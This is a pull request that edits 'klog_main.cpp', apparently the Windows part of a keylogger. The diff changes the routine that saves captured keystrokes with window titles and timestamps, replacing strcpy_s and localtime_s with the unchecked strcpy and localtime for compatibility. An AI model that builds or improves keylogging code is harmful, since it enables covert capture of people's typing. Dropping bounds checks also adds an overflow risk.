### PR TITLE
Update klog_main.cpp

### DIFF
--- a/windows/klog_main.cpp
+++ b/windows/klog_main.cpp
@@ -129,14 +129,14 @@ int Save(int key_stroke)
 
 		if (strcmp(window_title, lastwindow) != 0)
 		{
-			strcpy_s(lastwindow, sizeof(lastwindow), window_title);
+			strcpy(lastwindow, window_title);
+            // changed lines for compability
+            struct tm* tm_info;
+            time_t t = time(NULL);
+            tm_info = localtime(&t);
+            char s[64];
+            strftime(s, sizeof(s), "%FT%X%z", tm_info);
 
-			// get time
-			time_t t = time(NULL);
-			struct tm tm;
-			localtime_s(&tm, &t);
-			char s[64];
-			strftime(s, sizeof(s), "%FT%X%z", &tm);
 
 			output << "\n\n[Window: " << window_title << " - at " << s << "] ";
 		}


### PR DESCRIPTION
updated a couple of lines of code for compability problems

here i solved a error you could encounter on some windows computers: 

`identifier \"strcpy_s\" is undefined`
`identifier \"localtime_s\" is undefined`

This is meant only for the ones who don't have the **c standard library**, but this code is compiled in C++ so not everyone has it. 

please review